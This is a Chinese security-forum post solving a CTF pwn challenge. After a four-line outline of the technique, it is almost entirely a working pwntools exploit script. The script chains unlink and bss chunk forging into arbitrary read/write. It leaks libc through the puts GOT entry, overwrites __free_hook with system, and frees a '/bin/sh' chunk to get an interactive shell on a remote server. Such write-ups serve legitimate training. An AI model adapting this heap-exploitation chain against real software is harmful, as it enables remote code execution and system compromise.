首页
论坛
专栏
课程

[原创] 第二题:沉睡的敦煌

2019-6-22 22:13 416

[原创] 第二题:沉睡的敦煌

2019-6-22 22:13
416

1 unlink指向bss数组
2 edit在bss数组上面伪造堆
3 free bss数组上伪造的堆,在两个关键变量上写上libc的一个地址,实现任意edit和show
4 tcache攻击写freehook写入system地址

from pwn import *
context.log_level='debug'
cn=remote("152.136.18.34",10001)
#cn=process("./pwn",shell=False)
elf=ELF("./pwn")

def create(id,data):
    cn.sendlineafter("4.show","1")
    cn.sendlineafter("index:",str(id))

    cn.recvuntil("gift: ")
    heap_addr = int(cn.recvuntil("\n")[:-1], 16)
    cn.sendafter("ontent:",data)
    return heap_addr

def delete(id):
    cn.sendlineafter("4.show", "2")
    cn.sendlineafter("index:",str(id))

def edit(id,data):
    cn.sendlineafter("4.show", "3")
    cn.sendlineafter("index:",str(id))
    cn.sendafter("ntent:",data)

def show(id):
    cn.sendlineafter("4.show", "4")
    cn.sendlineafter("index:",str(id))



heap_addr=create(0,"a")
cnt=1
for i in range(7):
    success(hex(cnt))
    create(cnt,"a")
    cnt=cnt+1
    create(cnt, "a")
    delete(cnt-2)
    create(cnt-2,"A"*0x28+"\xb0")
    delete(cnt-1)
    cnt=cnt+1

array_base=0x404080
target_addr=array_base+0x8*31

create(31,p64(0x30)+p64(0x51)+p64(target_addr-0x18)+p64(target_addr-0x10))
cnt=cnt+1
create(cnt,"a")
cnt=cnt+1
test=create(cnt,"a")
record=cnt
delete(cnt-1)
create(cnt-1,"A"*0x20+p64(0x50)+"\xb0")
cnt=cnt+1
create(cnt,"a")
cnt=cnt+1
create(cnt,"a")
cnt=cnt+1
create(cnt,p64(0xb0)+p64(0x31)+p64(0xb0)+p64(0x31))
cnt=cnt+1
create(cnt,p64(0)+p64(0x31)+p64(0)+p64(0x31))
delete(record)

#delete(31)

success(hex(cnt))
#success(hex(test))
success(hex(heap_addr))
delete(0)
offset=heap_addr+0x5e0-0x2a0-0x404170
edit(31,p64(0x404180)*2+p64(array_base)+p64(offset+1))
create(3,"aa")
create(5,"aa")
create(7,"aa")
aaa=create(0,p64(0)+p64(0x31)+p64(array_base-0x18)+p64(array_base-0x10)+p64(0))
bbb=create(1,p64(0x31)+p64(0x31))
create(9,"aaaa")


delete(29)

success(hex(heap_addr))
success(hex(aaa))
success(hex(bbb))
edit(30,p64(elf.got["puts"]))
show(0)
cn.recv()
puts_addr=u64(cn.recv(6).ljust(8,"\x00"))
libc_base=puts_addr-0x0809c0
free_hook=libc_base+0x3ed8e8
sys_addr=libc_base+0x04f440
success(hex(libc_base))
success(hex(puts_addr))
success(hex(free_hook))
edit(30,p64(free_hook))
edit(0,p64(sys_addr))
edit(3,"/bin/sh")
delete(3)
cn.interactive()


[公告]安全测试和项目外包请将项目需求发到看雪企服平台:https://qifu.kanxue.com

最新回复 (0)
游客
登录 | 注册 方可回帖
返回